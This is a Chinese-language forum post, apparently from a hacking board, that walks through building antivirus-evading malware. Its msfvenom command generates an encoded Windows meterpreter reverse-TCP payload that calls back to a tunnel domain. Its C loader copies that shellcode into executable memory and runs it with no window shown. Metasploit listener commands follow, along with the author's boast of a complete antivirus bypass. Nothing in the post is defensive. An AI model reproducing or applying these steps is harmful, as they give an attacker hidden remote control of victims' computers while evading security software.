|
|
metasploit生成的exe文件很小,但是免杀效果不行, 找了很多资料, 只有生成c语言shellcode,然后c#重新编译, 这种免杀效果,挺让人满意的
首先需要生成客户端,客户端使用了ngrok内网穿透, 参考 :https://www.cnblogs.com/diligenceday/p/11009759.html
运行下面代码
[pre]
root@kali:~/Desktop/sunny# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 14 lhost=freXe.idcfXXye.com lport=10068 -f c
[/pre]
将生成的shellcode替换到一下代码, 然后使用vs重新编译:
[pre]
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口
#include <stdio.h>
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <memory>
#include <memory.h>
unsigned char buf[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx";void main() {
PVOID pAddr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(pAddr, buf, sizeof(buf));
((void(*)())pAddr)();
}
[/pre]
完美过免S, 舒服了
监听本地端口
[pre]
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.11
set LPORT 8000
exploit
[/pre] |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|
[复制链接]
发表于 2020-1-22 11:25:26
发表于 2020-1-28 14:53:51
